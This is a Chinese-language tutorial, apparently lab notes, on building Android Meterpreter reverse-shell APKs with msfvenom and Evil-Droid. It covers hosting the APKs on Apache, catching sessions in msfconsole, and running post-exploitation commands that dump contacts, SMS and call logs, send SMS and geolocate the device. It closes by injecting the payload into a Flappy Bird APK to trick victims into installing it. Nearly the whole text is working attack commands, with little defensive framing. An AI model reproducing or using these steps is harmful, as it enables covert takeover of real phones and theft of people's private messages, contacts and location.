設定環境
192.168.1.9
。生成 Android Payload
使用 MSFVenom 創建 Android Meterpreter Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=5555 -o shell.apk
在 Kali Linux 中啟動 Apache2 伺服器以傳送 payload:
sudo service apache2 start
將生成的 shell.apk
移動到 Apache 網站目錄:
sudo mv shell.apk /var/www/html/
傳送並安裝 Payload
shell.apk
:
http://192.168.1.9/shell.apk
。設置 MSF Console 並啟動 Meterpreter
在 Kali Linux 中啟動 MSF Console:
msfconsole
使用多重處理程序來啟動 Meterpreter:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 5555
run
當目標運行 shell.apk
後,Kali Linux 將會啟動 Meterpreter 會話。
使用 Meterpreter 進行後期利用
getuid
:顯示目標用戶身份。dump_calllog
:擷取通話紀錄。dump_contacts
:擷取聯絡人列表。dump_sms
:擷取 SMS 訊息。send_sms
:發送 SMS 訊息。geolocate
:獲取目標設備的經緯度。管理 Android Payload
介紹
安裝與設置 Evil Droid
在 Kali Linux 中開啟瀏覽器,搜尋 "Evil Droid" 並找到 GitHub 頁面。
複製 GitHub 連結並使用 git clone
下載工具。
進入下載的目錄,並確認工具檔案:
cd Evil-Droid
ls
將 evil-droid
設為可執行文件並以 sudo
啟動:
chmod +x evil-droid
sudo ./evil-droid
程式將自動檢查並安裝所需的依賴,並啟動 Apache2 和 PostgreSQL 服務。
生成 Android APK Payload
Create APK MSF
)。EvilAPK
)。android/meterpreter/reverse_tcp
。傳送並安裝 Payload
將生成的 APK 檔案移動到 Apache2 伺服器目錄:
sudo mv EvilAPK.apk /var/www/html/
在 Android 設備上透過瀏覽器訪問並下載 APK:
http://192.168.1.9/EvilAPK.apk
。安裝並開啟 APK,Meterpreter 會話將在 MSF Console 中啟動。
後期利用與命令測試
app_list
:列出安裝的應用程式。check_root
:檢查設備是否已 Root。dump_contacts
:擷取聯絡人列表。send_sms
:發送 SMS 訊息。小結
msfvenom
創建 payload 並將其注入到 Flappy Bird APK 中。x
參數指定要注入的 APK 檔案。若在注入 payload 過程中遇到問題,請先移除舊版 Apktool 並重新安裝:
sudo apt-get remove apktool
下載並安裝 Apktool:
瀏覽 Apktool 官方網站,按照步驟安裝 Apktool 及其依賴。
將安裝腳本和 jar 檔案移動到 /usr/local/bin/
目錄下,並確保其具有執行權限:
sudo chmod +x /usr/local/bin/apktool
sudo chmod +x /usr/local/bin/apktool.jar
使用 msfvenom 將 payload 注入 Flappy Bird:
sudo msfvenom -x Flappy_Bird.apk -p android/meterpreter/reverse_tcp LHOST=你的IP地址 LPORT=5555 -o test.apk
成功生成後,將新生成的 test.apk
移動到 Web 伺服器目錄,並啟動 Apache 伺服器。
test.apk
。app_list
, dump_contacts
等等。這個過程展示了如何將合法的 Android 應用程式與惡意 payload 結合,以欺騙目標用戶在不知不覺中執行惡意軟體。這種技術在社會工程攻擊中非常常見,特別是在目標不會仔細檢查應用程式來源或權限的情況下。